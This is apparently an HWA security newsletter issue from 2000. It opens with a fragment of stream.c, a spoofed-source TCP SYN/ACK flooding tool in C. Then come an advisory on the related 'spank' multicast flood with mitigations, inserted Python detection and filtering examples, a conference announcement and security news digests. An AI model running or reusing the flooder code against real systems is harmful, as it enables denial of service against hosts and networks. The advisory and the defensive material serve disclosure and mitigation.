packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; /* IP_DF? 
*/ packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = random(); packet.tcp.th_flags = 0; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_dport = dstport?htons(dstport):rand(); /* packet.opt.type = 0x02; packet.opt.len = 0x04; packet.opt.value = htons(1460); */ cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { /* patched by 3APA3A to send 1 syn packet + 1023 ACK packets. */ if( !(i&0x4FF) ) { packet.tcp.th_sport = rand(); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); packet.tcp.th_flags = TH_SYN; packet.tcp.th_ack = 0; } else { packet.tcp.th_flags = TH_ACK; packet.tcp.th_ack = random(); } /* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */ ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!dstport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("jess"); } } int main(int argc, char *argv[]) { int on = 1; printf("stream.c v1.0 - TCP Packet Storm\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nResolving IPs..."); fflush(stdout); dstaddr = lookup(argv[1]); dstport = atoi(argv[2]); pktsize = atoi(argv[3]); printf("Sending..."); fflush(stdout); flooder(); return 0; } @HWA 14.0 Spank, 
variation of the stream.c DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

------------------------------------------------
Explanation of the 'spank' attack -- a new breed stream/raped
------------------------------------------------

By: lst (yardley@uiuc.edu)

This is a tad different than the previous release. Stream/Raped merely flooded the host with ACKs (or no flags) and came from random IPs with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly.

The attacker specifies the port[s] that they want to send the attack to; depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing.

In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops. In the worst case, you lock up, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate -- bandlim type idea). In other words, you go to the drop routine instead of dropwithrst, silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect).

The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack. I have been getting mailed a lot about this.
Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped; however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets, which in turn will help stop the storm that you generate, and in general harden the tcp/ip stack to behave the way it is supposed to.

The main effect of this attack is that you are shooting back RST+ACKs at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well, although I did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case.

Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are received, what rules and filters you have set up, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work.
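The storm described above has a recognisable shape on the wire: a large number of distinct (spoofed) sources sending ACK-only or flagless TCP to one host, a matching burst of RST+ACK replies leaving that host, and ICMP unreachables coming back for the sources that do not exist. The following is an added example, not part of lst's post or of this issue, that runs that detection over a constructed set of flow records of the kind a sensor or flow collector might export. The record layout, the thresholds (200 sources and 100 RSTs per one-second window) and the synthetic traffic are all assumptions chosen for the demonstration.

```python
"""Added example (not from the HWA issue or lst's post): detection logic for the
spoofed ACK / RST storm, run over constructed flow records."""
from collections import defaultdict
from dataclasses import dataclass
import random

TH_SYN, TH_RST, TH_ACK = 0x02, 0x04, 0x10


@dataclass(frozen=True)
class Record:
    """One flow record as a sensor might export it (constructed layout)."""
    ts: float            # seconds
    proto: str           # "tcp" or "icmp"
    src: str
    dst: str
    flags: int = 0       # TCP flags; 0 for ICMP
    icmp_type: int = -1  # 3 = destination unreachable


def stream_indicators(records, window=1.0):
    """Aggregate, per (host, window bucket): distinct sources sending ACK-only or
    flagless TCP to the host, RST+ACK segments the host sent back, and ICMP
    unreachables it received."""
    buckets = defaultdict(lambda: {"ack_srcs": set(), "rst_out": 0, "unreach_in": 0})
    for r in records:
        b = int(r.ts // window)
        if r.proto == "tcp" and r.flags in (0, TH_ACK):
            buckets[(r.dst, b)]["ack_srcs"].add(r.src)
        elif r.proto == "tcp" and r.flags & TH_RST:
            buckets[(r.src, b)]["rst_out"] += 1      # the victim is the sender here
        elif r.proto == "icmp" and r.icmp_type == 3:
            buckets[(r.dst, b)]["unreach_in"] += 1
    return buckets


def alerts(records, min_sources=200, min_rst=100, window=1.0):
    """Hosts for which some window shows both the spoofed ACK storm and the RST
    storm it provokes.  Thresholds are assumptions; tune them to the link."""
    out = []
    for (host, b), v in stream_indicators(records, window).items():
        if len(v["ack_srcs"]) >= min_sources and v["rst_out"] >= min_rst:
            out.append((host, b, len(v["ack_srcs"]), v["rst_out"], v["unreach_in"]))
    return sorted(out)


def constructed_records(seed=1):
    """Synthetic traffic: benign ACKs to 10.0.0.2 from five real peers, then one
    second of stream-style flooding against it from 500 random sources, with the
    stack's RST+ACK replies and unreachables for every third (nonexistent) source."""
    rng = random.Random(seed)
    recs = []
    for i in range(50):
        recs.append(Record(i * 0.01, "tcp", "10.0.1.%d" % (i % 5), "10.0.0.2", TH_ACK))
    for i in range(500):
        src = "%d.%d.%d.%d" % tuple(
            rng.randrange(1, 224) if j == 0 else rng.randrange(256) for j in range(4))
        ts = 1.0 + i * 0.001
        recs.append(Record(ts, "tcp", src, "10.0.0.2", rng.choice([0, TH_ACK])))
        recs.append(Record(ts, "tcp", "10.0.0.2", src, TH_RST | TH_ACK))
        if i % 3 == 0:
            recs.append(Record(ts + 0.0005, "icmp", "10.0.0.1", "10.0.0.2", icmp_type=3))
    return recs


if __name__ == "__main__":
    for host, bucket, nsrc, nrst, nunr in alerts(constructed_records()):
        print("storm against %s in window %d: %d sources, %d RSTs out, %d unreachables in"
              % (host, bucket, nsrc, nrst, nunr))
```

Keying the RST count on the sender and the ACK count on the receiver is what ties the two halves of the storm to the same host; either signal alone (many sources, or many RSTs) is noisy on a busy server, the pair is not.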
I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways, since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to the network than the previous attack, and its effects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up), since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast.

Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address, which means that a temporary route table entry is being created for each one. These entries take time to time out. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on. Route table entries can be controlled somewhat under FreeBSD with:

[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128

You can do the following to help, if the route table is at least part of the problem:

sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2

Things that will help:

1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack, because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn.

I hope that this helps, or explains a little more at least.
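The three countermeasures above, as an added Python model that is not code from this issue, from stream.c or from lst's post. It re-implements the RFC 1071 Internet checksum in the same fold-the-carries form as the reference in_cksum() in stream.c, parses a constructed IPv4+TCP header pair (verifying the IP checksum), and then decides per inbound segment whether a stack should accept it, drop it silently, or answer with a RST subject to a token-bucket budget in the spirit of ICMP_BANDLIM. The multicast test uses the whole class D range 224.0.0.0/4; the packet builder, the RstLimiter class and the decide() rules are assumptions for the demonstration, and nothing is sent on the wire.

```python
"""Added example (not from the HWA issue, stream.c or lst's post): RFC 1071
checksum, header parsing and the three spank/stream countermeasures."""
import ipaddress
import struct
import time

TH_FIN, TH_SYN, TH_RST, TH_ACK = 0x01, 0x02, 0x04, 0x10
MULTICAST = ipaddress.IPv4Network("224.0.0.0/4")   # the whole class D range


def in_cksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, odd trailing
    byte zero-padded, carries folded back into the low 16 bits, then inverted."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold until no carry remains
        total = (total >> 16) + (total & 0xFFFF)
    return (~total) & 0xFFFF


def build_ipv4_tcp(src, dst, sport, dport, flags):
    """Constructed test packet: 20-byte IPv4 header with its checksum filled
    in, followed by a 20-byte TCP header.  The TCP checksum is left zero and
    parse() does not check it."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0, 64, 6, 0,
                     ipaddress.IPv4Address(src).packed,
                     ipaddress.IPv4Address(dst).packed)
    ip = ip[:10] + struct.pack("!H", in_cksum(ip)) + ip[12:]
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 0, 5 << 4, flags,
                      16384, 0, 0)
    return ip + tcp


def parse(pkt: bytes) -> dict:
    """Extract the fields the filter needs.  A correct IPv4 header, summed over
    all of its bytes including the checksum field, yields zero."""
    ihl = (pkt[0] & 0x0F) * 4
    if in_cksum(pkt[:ihl]) != 0:
        raise ValueError("bad IP header checksum")
    sport, dport, _seq, _ack, _off, flags = struct.unpack(
        "!HHIIBB", pkt[ihl:ihl + 14])
    return {"proto": pkt[9], "src": ipaddress.IPv4Address(pkt[12:16]),
            "dst": ipaddress.IPv4Address(pkt[16:20]), "sport": sport,
            "dport": dport, "flags": flags}


class RstLimiter:
    """Token bucket in the spirit of ICMP_BANDLIM: at most `rate` RSTs per
    second.  `now` is injectable so the behaviour can be tested offline."""

    def __init__(self, rate, now=time.monotonic):
        self.rate, self.now = rate, now
        self.tokens, self.last = float(rate), now()

    def allow(self) -> bool:
        t = self.now()
        self.tokens = min(self.rate, self.tokens + (t - self.last) * self.rate)
        self.last = t
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


def decide(hdr, listeners, established, limiter) -> str:
    """Return 'accept', 'drop' (silent) or 'rst' for one inbound segment.
    `listeners` is a set of listening ports; `established` a set of
    (src, sport, dport) tuples for connections the stack already knows."""
    if hdr["proto"] != 6:
        return "accept"                       # not TCP, outside this model
    # 1. multicast is never valid for TCP: silent drop, no lookup, no reply
    if hdr["src"] in MULTICAST or hdr["dst"] in MULTICAST:
        return "drop"
    if hdr["flags"] == 0:                     # a flagless segment is illegal
        return "drop"
    if (hdr["src"], hdr["sport"], hdr["dport"]) in established:
        return "accept"
    # 3. only a SYN is matched against listening sockets
    if hdr["flags"] & TH_SYN and hdr["dport"] in listeners:
        return "accept"
    # 2. anything else would earn a RST: send one only within the budget,
    #    otherwise take the silent drop path instead of dropwithrst
    return "rst" if limiter.allow() else "drop"
```

The point of the limiter is the one the text makes: once the budget is spent, the spoofed ACKs cost the stack a header check and nothing else, and the RST storm (and the ICMP unreachables it bounces back) stops growing with the input rate.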
---------------------------------------------------
Temporary remedy
---------------------------------------------------

If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue.

-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --

Optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow), but you have bigger problems than the attack if that is the case.

-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --

That will help you "stop" the attack (actually it will just help minimize the effects), although it will still use some CPU.

Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds.

FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff

-----------------------
Conclusion
-----------------------

This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms.

--------------------
References
--------------------

This was done independently, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due.
The following people contributed in some way or another:

Brett Glass
Alfred Perlstein
Warner Losh
Darren Reed
Don Lewis

Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)

-------------------
Attached
-------------------

These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet

For an "unofficial" patch: http://www.w00w00.org/files/spank/don_lewis_tcp.diff
For spank.c: http://www.w00w00.org/files/spank/spank.c

@HWA

15.0 Canadian Security Conference announcement: CanSecWest.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Canc0n may have failed as the first security/hacker con in Canada, so here is a promising sounding event pulled off by professional boys.

CanSecWest/core00
April 19th, 20th, 21st, 2000
Vancouver, BC, Canada.

"Every IT/Security person who can attend, should attend. CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada."

Website: http://www.dursec.com/

Some high profile speakers are scheduled to appear. Noted speakers include:

Ron Gula - Network Security Wizards
Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area.

Ken Williams - Ernst & Young
The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600, now of Ernst & Young's security team, will give some pointers on NT security.

Marty Roesch - www.hiverworld.com
Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders.
rain.forest.puppy - www.wiretrip.net
Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys - will amaze and amuse with some 0 day exploit training.

Theo DeRaadt - OpenBSD
The leader of the OpenBSD Secure operating system project will talk about securing operating systems.

Fyodor - www.insecure.org
Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network.

Max Vision - www.maxvision.net - www.whitehats.com
Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation.

Dragos Ruiu - dursec.com
Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately.
@HWA

16.0 Security Portal review Jan 16th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Entrust - We Bring Trust to e-Business

Entrust Technologies lets you tap into new global e-business markets by securing applications for Web, e-mail, ERP, VPN, desktop files and folders, as well as a comprehensive suite of solutions to deliver trusted e-business transactions to the exploding wireless Internet appliance market. For more information on this complete range of security solutions for e-business visit http://www.entrust.com . Come see us at RSA 2000, San Jose, CA, Jan. 16-20, 2000, San Jose McEnery Convention Center, Booth #416.

******* What's new with SecurityPortal.com *******

Linux vs Microsoft: Who solves security problems faster?

Does Open Source plug security holes quickly? We took a look at the security advisories issued by Microsoft and Red Hat in 1999 to gauge the time lag between the point of a "general community awareness" of a security problem and the point at which a patch was released. Find out who won here.

SecurityPortal.com is proud to sponsor Techno-Security 2000
April 16-19, 2000
Wyndham Myrtle Beach Resort
Myrtle Beach, South Carolina

This one-of-a-kind conference is intended for private industry, government, law enforcement decision makers and technical experts interested in, or involved with, information security, operations security, high tech crime and its prevention.

Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell, Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr. Terry Gudaitis, Matt Devost and many more...

This year's high intensity tracks will include: Hacker Profiling, Intrusion Detection, Beginner & Advanced Computer Forensics, e-Commerce Security, Body Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing, Incident Response, Tools for Protecting the Enterprise, PKI, plus many more.

Registration is available on-line at: www.TheTrainingCo.com or call 410.703.0332 for more information.

******* Vendor Corner *******

Sponsored by Trend Micro, Inc. http://www.antivirus.com .

ScanMail for Lotus Notes is a native Domino server application.
- First product to provide complete, scalable virus protection for Lotus Notes.
- Detects and removes viruses hidden in databases and email attachments.
- Provides real-time scanning of incoming and outgoing emails through the Domino server.
- Infection notification and provides a Virus Activity Report to assist in tracing and securing virus point entry.
- Multi-threaded architecture delivers high performance.
- SmartScan eliminates redundant scanning to maximize server efficiency.

******* Top News *******

January 17, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Biggest news of last week was probably the new encryption export regulations released by the U.S. We will let you know when our lawyers get through them.

Recent postings in our top news:

Jan 17, 2000

MSNBC: Microsoft certificate bug crashes Netscape browser - IIS 4 does not correctly support 56-bit certificates, so when Communicator tries to step up to the highest level of security (128-bit key length certificates), it simply crashes with an invalid page fault in NETSCAPE.EXE

ZDNet: Computer glitch gives Canadian Microsoft Web site - a glitch at Network Solutions briefly gave a Canadian ownership of Microsoft.com and Yahoo.com over the weekend

Jan 15, 2000

ABCNews: Online Credit Hacker May Be Out for Profit - While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that Maxus is actually a two-man team in Russia engaged in a well-organized credit card fraud

FCW: FBI beefs up cyberagent squads nationwide - The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office

ZDNet: Network Associates divides itself - Convinced that six smaller companies can compete better than one big one, Network Associates gives up on its integrated security strategy

ZDNet: How to steal 2,500 credit cards - Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site

Jan 14, 2000

IDG: U.S., EU to meet on data privacy - The U.S. government has invited representatives from European Union countries to Washington D.C. next week to work out an agreement on data privacy before their self-imposed March deadline

CNet: Security software firm Tripwire plans Linux push - Security software maker Tripwire is planning to unveil a major expansion into new types of computing products, especially those running on the Linux operating system

ZDNet: Crypto compromise a lawyers' delight - It's supposed to ease encryption export controls. But have the Clinton Administration's new regs instead created a legal maze?

CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED NEWAPTd - Computer Associates International, Inc. yesterday warned computer users of a worm called "NewApt.D," a new variant belonging to the NewApt family of Win32 worms. The worm uses e-mail and executable attachments to propagate from one computer to another. This worm has been reported in the wild. The original NewApt worm was first detected in December 1999

Jan 13, 2000

CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000 - Computer Associates International, Inc. today warned computer users of a new worm called Plage2000 which could threaten computer email systems as well as eBusiness infrastructures. This worm has been reported to be in the wild by CA customers.
CA's antivirus research team is analyzing this worm and will provide more details as they are determined

InternetNews: Circle Tightens Around Online Credit Card Thief - Law enforcement officials may be closing in on Maxus, the Russian cracker who stole 300,000 credit card numbers from e-tailer CD Universe last month and dispensed them for free to visitors of his Web site

Microsoft Bulletin: Patch Available for Spoofed LPC Port Request Vulnerability - The LPC vulnerability could allow a user logged onto a Windows NT 4.0 machine from the keyboard to become an administrator on the machine

Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux - Secure Computing Corporation today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications

ComputerWorld: Teens steal thousands of Net accounts - A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California

Commerce Announces Streamlined Encryption Export Regulations - The U.S. Department of Commerce Bureau of Export Administration (BXA) today issued new encryption export regulations which implement the new approach announced by the Clinton Administration in September

InfoWorld: Oracle turns focus to security with Release 2 of 8i database - With an eye on the complex security needs of large electronic-commerce sites, Oracle next week will introduce Release 2 of its flagship database, Oracle 8i, at the RSA Conference 2000 in San Jose, Calif

FCW: Army establishes Infowar DMZ - The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks

Jan 12, 2000

FSecure: First Windows 2000 Virus Found - F-Secure Corporation, a leading provider of centrally-managed, widely distributed security solutions, today announced the discovery of the first Windows 2000 virus. Windows 2000 is the upcoming new operating system from Microsoft, due to be released later this year. The new virus is called Win2K.Inta or Win2000.Install. It appears to be written by the 29A virus group. It operates only under Windows 2000 and is not designed to operate at all under older versions of Windows

Kurt's Closet: Some thoughts on (network) intrusion detection systems - Kurt makes the case for the necessity of emulated intelligence within intrusion detection systems and reviews some current research projects in this field

RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino R5 - Lotus to integrate RSA's KEON public key infrastructure software into Notes and Domino R5

ZDNet: Data thief threatens to strike again - An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site

Wired: Domains Hijacked from NSI - Network Solutions' administrative policies are once again being blamed for Internet domain hijackings that took at least brief control over some major Web domains

Jan 11, 2000

InternetNews: Cybercash Disputes Hacker's Claim - Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the company's credit card verification system was penetrated, resulting in the theft of thousands of credit card numbers from an online music store

FoxNews: Designed for Destruction - Deliberately destructive viruses are on an upward trend, according to Symantec's Antivirus Research Center (SARC). Approximately 10 percent of 1993 viruses were deliberately destructive, but in 1997 that number rose to 35 percent. Often masquerading as innocuous e-mail, games or even fixes to real problems like the Y2K bug, today's viruses are more insidious than their counterparts were only a few years ago

Wired: Crack Exposes Holes in the Web - There are Web site cracks, there are break-ins, and there are thefts. But now and then one rises above the fray to teach a sudden lesson about all things Internet

NWFusion: Win 2000 VPN technology causes stir - When it ships next month, Microsoft's Windows 2000 will come with technology for setting up an IP Security-based virtual private network. The question is: Will established VPN products from other vendors work with Microsoft's technology?

New Internet Explorer vulnerability discovered by Guninski - Georgi Guninski posted a new advisory concerning a new IE 5 security vulnerability - circumventing Cross-frame security policy and accessing the DOM of "old" documents. This vulnerability can potentially allow access to local data. No response from Microsoft yet

Securing E-Business in the New Millennium - this article states the real threat will continue to be from within, and provides advice on the primarily low tech preventative measures any organization should take

Jan 10, 2000

Sophos: Virus found on magazine CD ROM - The WM97/Ethan virus was accidentally distributed on the December 1999 cover CD ROM of Developers Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999, contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC

Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43 Deferral - Any PIX Firewall on which version 4.43 software is present will continuously reboot. No other released versions of PIX Firewall are affected

******* What's new with SecurityPortal.com *******

Email Bombing

Denial of Service (DoS) attacks, strange variants in the computer crime arena, often occur without clear economic motive. Usually, they arise from anarchistic impulses within the computer underground. And, email bombing is one of the easiest DoS attacks for the Huns of the Internet to perfect. Read the story here.

Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com .
Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

@HWA

17.0 Security Portal review Jan 24th
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

******* Vendor Corner *******

Write Your Information Security Policies In A Day!

INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+ already-written security policies by internationally-known consultant Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in Version 7! ISPME v7 is the most comprehensive collection of policies available covering the latest technology developments and infosec topics. Each of these policies is accompanied by commentary detailing policy intention, audience, and the circumstances where it applies. Save weeks of time and thousands of dollars developing policies for information security manuals, systems standards, etc. with no consultant fees. Visit us at http://www.baselinesoft.com for more information.

******* What's new with SecurityPortal.com *******

The Clock Strikes Midnight for RSA

In a date more feared by RSA Security than Y2K, the patent for the venerable RSA data encryption algorithm will expire on September 20th of this year. No longer will RSA be able to charge royalties for the algorithm, first published by Ron Rivest, Adi Shamir and Leonard Adleman in 1977 and patented in 1983. After patent expiration, the algorithm will become part of the public domain, and companies will be free to incorporate the algorithm into their products without paying RSA any type of royalty or licensing fee. Although the demise of a 17 year patent for widely used technology is a big deal, there is also a distinct possibility that, like Y2K, it will turn out to be a non-event due to the momentum of the established security industry. Read the full story here.

******* Vendor Corner *******

NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing:
* the leader in bringing trust to e-business
* a solution that will evolve with your e-business needs
* a single, reliable trust backbone for all that you do

Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2

******* Top News *******

January 24, 2000

Welcome to SecurityPortal.com - The focal point for security on the Net.

Recent postings in our top news:

Jan 24, 2000

IDG: NEC to unveil world's strongest encryption system - NEC says it will unveil a new encryption technology on Monday that it claims to be the world's strongest

ZDNet: Mitnick: I was manipulated - Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times reporter for allegedly treating him unjustly in the court and in the media over the past six years

Jan 21, 2000

Microsoft: Patch Available for "RDISK Registry Enumeration File" Vulnerability - Microsoft has released a patch that eliminates a security vulnerability in an administrative utility that ships with Microsoft® Windows NT® 4.0, Terminal Server Edition. The utility creates a temporary file during execution that can contain security-sensitive information, but does not appropriately restrict access to it. As a result, a malicious user on the terminal server could read the file as it was being created.

CNN: Microsoft vows security commitment on Windows 2000 - Microsoft is pledging a firm commitment to security with measures such as equipping its upcoming Windows 2000 operating system with 128-bit encryption and interacting with users and rival vendors to detect software breaches and bugs, a high-ranking company official said in a keynote speech at the RSA Conference 2000 show here Tuesday.

iDEFENSE and Internet Security Systems Form Strategic Alliance - Infrastructure Defense, Inc. (iDEFENSE), a leading intelligence and risk management consulting company, and Internet Security Systems (ISS) (Nasdaq: ISSX), a leading provider of security management solutions for e-business, announced today a strategic agreement to integrate iDEFENSE and ISS capabilities, providing customers with an expanded line of information security offerings. As a result of the agreement, iDEFENSE and ISS will share expertise, data and resources as well as resell each company's products and services to respective customers

ZDNet: Hacker Mitnick to be released Friday - Come Friday, for the first time since 1995, Kevin Mitnick will be free. Will he hack again?

OpenBSD Security Advisory: procfs - Systems running with procfs enabled and mounted are vulnerable to having the stderr output of setuid processes directed onto a pre-seeked descriptor onto the stack in their own procfs memory

FreeBSD Security Advisory: make - make uses the temporary file in an insecure way, repeatedly deleting and reusing the same file name for the entire life of the program. This makes it vulnerable to a race condition wherein a malicious user could observe the name of the temporary file being used, and replace the contents of a later instance of the file with her desired commands after the legitimate commands have been written

Jan 20, 2000

Currents: Virus Attacks Cost 12Bil - Virus attacks cost organizations a total of $12.1 billion during 1999, according to a report released today. Released by Computer Economics, the report said that over the last three years there has been a major programming shift as viruses have become far more malicious and specifically designed for destruction and damage

UnionTribune: Global Health hit by hacker - A Poway company selling health products over the Internet was the apparent victim of a "hacker," who took information containing customer names and credit-card numbers and posted them on a Web site. The incident occurred Monday when someone accessed a little-used Web site kept by Global Health Trax, posted information that had been deleted months ago, then tipped off a reporter for MSNBC about it

Wired: Say Hello to the NSA - It wasn't hard to do if you were at the RSA Security conference this week in San Jose. The National Security Agency was there, like any other exhibitor, to be seen and promote technology partnerships

